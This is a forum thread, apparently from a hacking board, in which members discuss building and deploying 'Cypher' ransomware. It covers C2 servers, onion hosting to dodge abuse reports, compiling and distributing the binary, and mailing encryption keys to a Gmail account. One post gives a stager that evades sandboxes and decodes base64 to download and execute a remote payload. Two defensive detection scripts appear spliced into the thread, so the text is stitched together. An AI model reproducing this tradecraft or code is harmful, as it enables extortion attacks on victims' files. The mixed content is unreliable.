Active Development: Cypher Ransomware.
#21
Here is a small update, I've spoken to a web developer friend of mine and after talking about the ransomware I had in development he wanted to take a crack at setting up a web app for its C&C. I have forked his work over to my GitHub account. I wanted to get your guys' opinion on this.

https://github.com/NullArray/Ransom

There is the web app, it has been written with Laravel, the PHP framework. In the interest of saving time I could see myself using this code for Cypher's C&C. But, on the other hand, it would go against a design principle I had in my head, that the entire project would be written in Python.

Anyway, opinions?
#22
(01-04-2017, 07:42 PM)Vector Wrote: Here is a small update, I've spoken to a web developer friend of mine and after talking about the ransomware I had in development he wanted to take a crack at setting up a web app for its C&C. I have forked his work over to my GitHub account. I wanted to get your guys' opinion on this.

https://github.com/NullArray/Ransom

There is the web app, it has been written with Laravel, the PHP framework. In the interest of saving time I could see myself using this code for Cypher's C&C. But, on the other hand, it would go against a design principle I had in my head, that the entire project would be written in Python.

Anyway, opinions?
Hello everybody!
This is my first post at this forum, so it's nice to meet you all. I have been reading the topic and find it very educational for a newbie like me. As to the subject, I guess your approach is a bit complicated. You could use a simple PHP+MySQL scheme with just a couple of lines of code. Anyway, in terms of operational security one would have to change C2 hosting every couple of days due to numerous abuse letters etc. There are a couple of repositories at GitHub where you can get an onion-based C&C, like this one: https://github.com/lucdew/goransomware (in Golang).
And there is one more feature you might consider useful: many ransomware victims are reluctant to pay, so they could turn to a third party to decipher. There must be a hard approach to this... if the ransom is not paid within the given time interval, "format ABCDEF" etc., with system derive the last in line. Well, pardon my mistakes, I'm not a native speaker.

Here is the Python server for the Cypher. Integrate them: https://github.com/mrmoss/ransomware/tree/master/server. I can test it later. PEACE AND LOVE )))
#23
(01-20-2017, 04:43 PM)hiaby Wrote:
(01-04-2017, 07:42 PM)Vector Wrote: Here is a small update, I've spoken to a web developer friend of mine and after talking about the ransomware I had in development he wanted to take a crack at setting up a web app for its C&C. I have forked his work over to my GitHub account. I wanted to get your guys' opinion on this.

https://github.com/NullArray/Ransom

There is the web app, it has been written with Laravel, the PHP framework. In the interest of saving time I could see myself using this code for Cypher's C&C. But, on the other hand, it would go against a design principle I had in my head, that the entire project would be written in Python.

Anyway, opinions?
Hello everybody!
This is my first post at this forum, so it's nice to meet you all. I have been reading the topic and find it very educational for a newbie like me. As to the subject, I guess your approach is a bit complicated. You could use a simple PHP+MySQL scheme with just a couple of lines of code. Anyway, in terms of operational security one would have to change C2 hosting every couple of days due to numerous abuse letters etc. There are a couple of repositories at GitHub where you can get an onion-based C&C, like this one: https://github.com/lucdew/goransomware (in Golang).
And there is one more feature you might consider useful: many ransomware victims are reluctant to pay, so they could turn to a third party to decipher. There must be a hard approach to this... if the ransom is not paid within the given time interval, "format ABCDEF" etc., with system derive the last in line. Well, pardon my mistakes, I'm not a native speaker.

Here is the Python server for the Cypher. Integrate them: https://github.com/mrmoss/ransomware/tree/master/server. I can test it later. PEACE AND LOVE )))


Thank you for your contribution and welcome to the forums. It's been a while since I have worked on this project due to some personal commitments unrelated to this work. That said, I know about the Go ransomware, pretty cool project, and yeah I have thought about getting the C&C set up on an onion. It's just one of those things that keep piling up on the workload. Anyway, thanks for linking the Python script, that looks interesting!
#24
How does it work? It looks a little bit too complicated.
#25
(01-27-2017, 11:26 PM)Universal Wrote: How does it work? It looks a little bit too complicated.

For now you can ignore the HTTP_Ops() function, that is for contacting the Django web app I intend to finish. For now you can just set up a Gmail account for the ransomware, and it will send details like the encryption key and such to that address. Basically what you will need to do is compile it with py2exe or PyInstaller, and distribute the binary through whichever means you find appropriate. As of now, if the target is on Linux, you will need to deliver the bootlocker as a .bin with it as well. Other than that it will just generate a key, encrypt the files based on extension and add a .crypt extension of its own. Then it will write out a readme file to the victim's desktop with instructions on how to recover the key. If you set everything up as it should be, the Gmail account should have the key and client ID to relay to the victim.
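The behaviour described in the post above (files renamed in bulk to a `.crypt` extension, then a readme dropped on the desktop) is what a defender would key on. The following is an added example, not code from the thread or the Cypher repository: a small sliding-window detector run over constructed file-activity events (the event format, pids, paths, window and threshold are all assumptions).

```python
import re
from collections import defaultdict, deque

# Constructed sample of file-activity events "<ts> <pid> <op> <path...>", the shape a
# file-monitoring agent might emit. Not real telemetry; timestamps are seconds.
EVENTS = """\
1500 4242 RENAME /home/u/docs/report.docx -> /home/u/docs/report.docx.crypt
1500 4242 RENAME /home/u/docs/budget.xlsx -> /home/u/docs/budget.xlsx.crypt
1501 4242 RENAME /home/u/docs/notes.txt -> /home/u/docs/notes.txt.crypt
1501 4242 RENAME /home/u/photos/a.jpg -> /home/u/photos/a.jpg.crypt
1502 4242 RENAME /home/u/photos/b.jpg -> /home/u/photos/b.jpg.crypt
1502 4242 CREATE /home/u/Desktop/README.txt
1600 1337 RENAME /home/u/tmp/draft.txt -> /home/u/tmp/draft.txt.crypt
"""

RENAME_RE = re.compile(r"^(\d+) (\d+) RENAME (\S+) -> (\S+)$")
NOTE_RE = re.compile(r"^(\d+) (\d+) CREATE (\S+/Desktop/README\S*)$")


def detect(events, window=10, threshold=5, ext=".crypt"):
    """Flag any pid that renames >= `threshold` files to `ext` within `window`
    seconds; for flagged pids also record a README created on a Desktop
    afterwards, which corroborates the ransom-note step described above."""
    recent = defaultdict(deque)   # pid -> timestamps of recent ext renames
    total = defaultdict(int)      # pid -> all ext renames seen so far
    alerts = {}
    for line in events.splitlines():
        m = RENAME_RE.match(line)
        if m:
            ts, pid, new_path = int(m[1]), m[2], m[4]
            if not new_path.endswith(ext):
                continue
            total[pid] += 1
            q = recent[pid]
            q.append(ts)
            while q and ts - q[0] > window:   # drop events outside the window
                q.popleft()
            if len(q) >= threshold:
                alerts.setdefault(pid, {"renames": 0, "ransom_note": None})
                alerts[pid]["renames"] = total[pid]
            continue
        m = NOTE_RE.match(line)
        if m and m[2] in alerts:
            alerts[m[2]]["ransom_note"] = m[3]
    return alerts


if __name__ == "__main__":
    print(detect(EVENTS))
```

A real deployment would feed the same logic from inotify, auditd or an EDR event stream and tune the window and threshold to the host's normal rename rate.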
#26
Just made a stager for Cypher. I may do a pull req on the github, but it's not fully tested yet. Should work though.

Code:
import requests, base64

def evader():
    try:
        while True:
            f = open('/fuewahvewa/fewaifhewafe/feaefefefefefe.f_u_av')
            f.close()
    except FileNotFoundError:
        return False # Not in sandbox/AV

evader()
exec(base64.b64decode(cGF5bG9hZCA9IHJlcXVlc3RzLmdldCgnaHR0cDovL2V4YW1wbGUuY29tL3BheWxvYWQucHknKS5yZXNwb25zZTsgZXhlYyhwYXlsb2FkKQo=))
#27
(05-09-2020, 07:46 PM)Dismal_0x8 Wrote: Just made a stager for Cypher. I may do a pull req on the github, but it's not fully tested yet. Should work though.

Well I am unfamiliar with the meaning of stager for malware, but take into account that creating that file would be an easy fix for the ransomware.
And because this is a string I see no problem in disassembling the executable or just running strings on it to get the path to fix.
A similar example was the famous WannaCry, in which the registration of a domain caused the spread to stop.
#28
enmafia2 Wrote: Well I am unfamiliar with the meaning of stager for malware, but take into account that creating that file would be an easy fix for the ransomware.
And because this is a string I see no problem in disassembling the executable or just running strings on it to get the path to fix.
A similar example was the famous WannaCry, in which the registration of a domain caused the spread to stop.

Sometimes malware execution is split into parts. For instance you have a small disposable stager and your main malware payload. The stager is sent to the target and executed. The stager sometimes has other functions, but it mainly downloads the main part of the payload. Stagers are helpful because they're small in size and are easy to just recode if they start getting detected by AV.
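Both points made above, that the stager's sandbox-probe path is a plain string and that the second stage is just a base64 literal handed to exec(), mean an analyst can triage such a script statically without running it. Here is an added example of that triage (not code from the thread or the Cypher repository): it parses the script's AST, lists hardcoded paths passed to open(), and decodes any exec()/eval() argument that is base64.b64decode() of a literal. The sample input is constructed, modelled on the posted stager, with an inert print as its second stage.

```python
import ast
import base64

# Constructed sample modelled on the thread's stager (probe path and structure as
# posted; the second stage here is an inert print, not a real payload).
STAGE_TWO = b"print('stage two placeholder')\n"
SAMPLE = (
    "import base64\n"
    "def evader():\n"
    "    try:\n"
    "        while True:\n"
    "            f = open('/fuewahvewa/fewaifhewafe/feaefefefefefe.f_u_av')\n"
    "            f.close()\n"
    "    except FileNotFoundError:\n"
    "        return False\n"
    "evader()\n"
    "exec(base64.b64decode('" + base64.b64encode(STAGE_TWO).decode() + "'))\n"
)


def _callee(call):
    """Bare name of a call target: exec(...) -> 'exec', base64.b64decode(...) -> 'b64decode'."""
    f = call.func
    return f.id if isinstance(f, ast.Name) else f.attr if isinstance(f, ast.Attribute) else ""


def _literal(node):
    """str/bytes constant value, or None if the node is not a plain literal."""
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)) else None


def triage(source):
    """Static triage of a Python script: hardcoded paths given to open() (the
    kill-switch/sandbox probe is one of them) and the decoded text of every
    exec()/eval() whose argument is b64decode() of a literal. Nothing is executed."""
    found = {"probed_paths": [], "decoded_stages": []}
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        name = _callee(node)
        if name == "open" and _literal(node.args[0]) is not None:
            found["probed_paths"].append(node.args[0].value)
        elif name in ("exec", "eval"):
            inner = node.args[0]
            if isinstance(inner, ast.Call) and inner.args and _callee(inner) == "b64decode":
                blob = _literal(inner.args[0])
                if blob is not None:
                    found["decoded_stages"].append(base64.b64decode(blob).decode("utf-8", "replace"))
    return found


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```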
#29
(05-09-2020, 09:52 PM)Dismal_0x8 Wrote:
enmafia2 Wrote: Well I am unfamiliar with the meaning of stager for malware, but take into account that creating that file would be an easy fix for the ransomware.
And because this is a string I see no problem in disassembling the executable or just running strings on it to get the path to fix.
A similar example was the famous WannaCry, in which the registration of a domain caused the spread to stop.

Sometimes malware execution is split into parts. For instance you have a small disposable stager and your main malware payload. The stager is sent to the target and executed. The stager sometimes has other functions, but it mainly downloads the main part of the payload. Stagers are helpful because they're small in size and are easy to just recode if they start getting detected by AV.

Oh okay I get it, I always called them droppers tho
#30
enmafia2 Wrote: Oh okay I get it, I always called them droppers tho

Yeah the line between stagers and droppers is kind of blurry. The way I think about it is that droppers are usually bigger and have more functionality.